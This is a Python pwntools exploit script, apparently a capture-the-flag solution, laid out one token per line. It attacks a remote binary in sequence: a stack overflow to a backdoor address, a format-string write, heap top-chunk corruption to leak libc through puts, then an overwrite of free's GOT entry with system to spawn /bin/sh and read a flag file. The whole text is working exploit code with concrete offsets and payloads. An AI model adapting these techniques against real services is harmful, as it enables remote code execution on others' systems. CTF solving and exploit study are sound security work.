from
pwn
import
*
sd
=
lambda
x:p.send(x)
sl
=
lambda
x:p.sendline(x)
sda
=
lambda
x,y:p.sendafter(x,y)
sla
=
lambda
x,y:p.sendlineafter(x,y)
ru
=
lambda
x:p.recvuntil(x)
rv
=
lambda
x:p.recv(x)
io
=
lambda
:p.interactive()
ps
=
lambda
:pause()
context.log_level
=
'debug'
i64_max
=
(
1
<<
64
)
-
1
p
=
remote(
'192.168.99.133'
,
'10006'
)
libc
=
ELF(
'./libc-2.23.so'
)
sla(
'(y/n)'
,
'y'
)
sl(
'./next'
)
hotel_backdoor
=
0x4006B6
sla(
'you?\n'
,b
'a'
*
0x38
+
p64(hotel_backdoor))
sla(
'you!'
,
'./next'
)
sla(
'you?\n'
,b
'%1515c%43$naaaa'
)
sla(
'you!'
,
'./next'
)
sla(
'go?\n'
,
'bedroom'
)
sla(
'go?\n'
,
'bedroom'
)
sda(
'name: '
,b
'a\x00'
*
8
+
p64(
0x400896
))
sla(
'go?\n'
,
'a'
)
sl(
'./next'
)
def
add(size, name, ac
=
True
):
if
type
(name)
=
=
str
:
name
=
name.encode()
payload
=
'create '
+
str
(size)
+
' '
payload
=
payload.encode()
+
name
if
ac:
sla(
'accept'
,payload)
else
:
sl(payload)
def
free(name, ac
=
True
):
if
type
(name)
=
=
str
:
name
=
name.encode()
payload
=
b
'destory '
+
name
if
ac:
sla(
'accept'
,payload)
else
:
sl(payload)
sla(
'?\n'
,
'create'
)
ru(
'address is: '
)
heap_address
=
int
(ru(
'\n'
),
16
)
print
(
'heap_address: '
,
hex
(heap_address))
sda(
'name: '
,b
'a'
*
0xf8
+
p64(i64_max))
add(
0x18
,
'aaa'
,
False
)
add(
0x18
,
'bbb'
)
add(
0x18
,
'ccc'
)
add(
0x18
,
'ddd'
)
add(
0x18
,
'eee'
)
free(
'ccc'
)
free(
'aaa'
)
add(
0x18
,
'aaa'
)
free_got
=
0x602018
add(
str
(free_got
-
heap_address
-
0x100
-
0x80
-
0x18
-
0xc0
),
'bbbb'
)
free(
'ddd'
)
free(
'aaa'
)
magic_addr
=
0x4010CF
add(
0x88
,b
'a'
*
8
+
p64(magic_addr).replace(b
'\x00'
,b
'\t'
)[:
-
1
])
add(
0x28
,b
'a'
*
0x10
)
sl(
'create'
)
sla(
'name: '
,p64(
0
)
+
p32(
0
)
+
p32(
2
)
+
p64(
0x6020e0
)
+
p64(
0x602030
)
+
b
'\x00'
*
(
0xf8
-
0x20
)
+
p64(i64_max))
free(
'world'
,
False
)
ru(
'world.\n'
)
puts_address
=
u64(rv(
6
)
+
b
'\x00\x00'
)
libc.address
=
puts_address
-
libc.sym[
'puts'
]
print
(
'libc->'
,
hex
(libc.address))
sys
=
libc.sym[
'system'
]
sh
=
next
(libc.search(b
'/bin/sh'
))
add(
str
(free_got
-
0x6021c0
-
0x20
),
'cccc'
,
False
)
ones
=
[
0x45216
,
0x4526a
,
0xf02a4
,
0xf1147
]
one
=
libc.address
+
ones[
3
]
add(
0x88
,b
'a'
*
8
+
p64(sys).replace(b
'\x00'
,b
'\t'
)[:
-
1
])
add(
0x18
,b
'/bin/sh\x00'
)
free(
'world'
,
False
)
sl(
'./next'
)
ru(
'world!\n'
)
sl(
'cat .../.really_flag'
)
io()